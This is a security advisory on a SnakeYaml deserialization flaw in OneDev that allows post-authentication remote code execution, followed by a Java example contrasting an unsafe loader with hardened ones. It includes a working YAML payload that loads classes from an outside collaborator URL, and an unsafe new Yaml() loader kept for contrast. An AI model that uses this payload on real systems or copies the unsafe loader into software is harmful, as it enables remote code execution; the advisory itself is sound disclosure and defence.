Impact
In order to parse and process YAML files, OneDev uses SnakeYaml, which by default (when not using SafeConstructor) allows the instantiation of arbitrary classes. We can leverage that to run arbitrary code by instantiating classes such as javax.script.ScriptEngineManager and using URLClassLoader to load the script engine provider, resulting in the instantiation of a user-controlled class. We can observe that by providing the following BuildSpec:
```yaml
version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
  image: asdasd
  commands:
  - asd
  retrieveSource: true
  cloneCredential: !DefaultCredential {}
  cpuRequirement: 250m
  memoryRequirement: 128m
  retryCondition: never
  maxRetries: 3
  retryDelay: 30
  timeout: 3600
```
By intercepting the resolution of the provided URL, we can prove that the payload succeeded.
This issue may lead to post-authentication remote code execution (RCE).
Patches
This issue was addressed in 4.0.3 by only allowing certain known classes to be deserialized.
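The following is an added example, not OneDev's code, showing the loader pattern the advisory describes as unsafe next to two hardened forms: SafeConstructor, which accepts only the standard YAML types, and an allow-list of known class names, which is the shape of the fix described above. It assumes the SnakeYaml 2.x API (SafeConstructor(LoaderOptions), Constructor(LoaderOptions), LoaderOptions.setTagInspector); the class names under com.example are hypothetical stand-ins for an application's own spec types, and the YAML documents are constructed for the demonstration. The tagged document names a harmless JDK class only to show that the global tag itself is what gets rejected.

```java
import java.util.Set;
import java.util.function.Function;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;
import org.yaml.snakeyaml.nodes.Tag;

/** Added example (not OneDev's code): loading YAML with SnakeYaml, from unsafe to allow-listed. */
public class YamlLoaderHardening {

    // Constructed sample input: a plain build spec, and one that carries a global ("!!")
    // tag naming a JDK class. With an unrestricted constructor, any class on the
    // classpath could be named in that position.
    static final String PLAIN_SPEC = "version: 1\njobs:\n- name: build\n  image: alpine\n";
    static final String TAGGED_SPEC = "version: 1\njobs:\n- name: !!java.lang.String [build]\n";

    // Hypothetical application types that a build spec is allowed to reference.
    static final Set<String> KNOWN_CLASSES = Set.of("com.example.BuildSpec", "com.example.Job");

    /** The pattern the advisory warns about: in SnakeYaml 1.x the default Constructor
     *  resolves any "!!fully.qualified.Name" tag to that class and instantiates it.
     *  (SnakeYaml 2.x rejects custom global tags here unless a TagInspector allows them.) */
    static Object loadUnsafe(String document) {
        return new Yaml().load(document); // never use with attacker-controlled input
    }

    /** Hardened: SafeConstructor knows only maps, lists and scalar types, and throws a
     *  ConstructorException for any other tag, so no application class is ever named. */
    static Object loadSafe(String document) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(document);
    }

    /** Allow-list variant: custom types stay usable, but a global tag is accepted only
     *  when its class name is in KNOWN_CLASSES; anything else fails before construction. */
    static Object loadAllowListed(String document) {
        LoaderOptions options = new LoaderOptions();
        options.setTagInspector(YamlLoaderHardening::isAllowed);
        return new Yaml(new Constructor(options)).load(document);
    }

    static boolean isAllowed(Tag tag) {
        // Global tags are "tag:yaml.org,2002:" followed by the class name.
        return tag.getValue().startsWith(Tag.PREFIX)
                && KNOWN_CLASSES.contains(tag.getClassName());
    }

    /** Runs one loader over one document and reports whether it loaded or was rejected. */
    static String tryLoad(String label, Function<String, Object> loader, String document) {
        try {
            Object result = loader.apply(document);
            return label + ": loaded " + result.getClass().getName();
        } catch (YAMLException e) {
            return label + ": rejected (" + e.getClass().getSimpleName() + ")";
        }
    }

    public static void main(String[] args) {
        System.out.println(tryLoad("safe / plain", YamlLoaderHardening::loadSafe, PLAIN_SPEC));
        System.out.println(tryLoad("safe / tagged", YamlLoaderHardening::loadSafe, TAGGED_SPEC));
        System.out.println(tryLoad("allow-list / tagged", YamlLoaderHardening::loadAllowListed, TAGGED_SPEC));
    }
}
```

The plain document loads under every variant as an ordinary java.util.Map. The tagged document is rejected by loadSafe (SafeConstructor has no constructor registered for the tag) and by loadAllowListed (the TagInspector refuses the global tag because java.lang.String is not a known class), which is the behaviour a fix that "only allows certain known classes" should produce. When reviewing a codebase, the thing to look for is a bare new Yaml() or new Yaml(new Constructor(...)) fed by user-supplied text.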
Credits
This issue was discovered by @pwntester